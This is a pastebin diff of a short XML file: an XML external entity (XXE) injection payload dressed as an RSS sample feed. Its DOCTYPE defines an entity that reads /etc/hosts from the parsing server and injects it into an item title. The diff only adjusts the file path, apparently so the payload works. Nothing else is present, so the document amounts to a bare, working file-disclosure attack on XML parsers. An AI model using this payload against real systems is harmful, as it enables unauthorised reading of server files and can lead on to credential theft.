View difference between Paste ID: ZiNJ7epT and qMYPJW6f
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="windows-1252"?>
2
<!DOCTYPE foo [  
3
   <!ELEMENT foo ANY >
4-
   <!ENTITY xxe SYSTEM "file://etc/hosts" >]>
4+
   <!ENTITY xxe SYSTEM "/etc/hosts" >]>
5
<rss version="2.0">
6
  <channel>
7
    <title>FeedForAll Sample Feed</title>
8
    <item>
9
      <title>&xxe;RSS Solutions for Restaurants</title>
10
    </item>
11
   </channel>
12
</rss>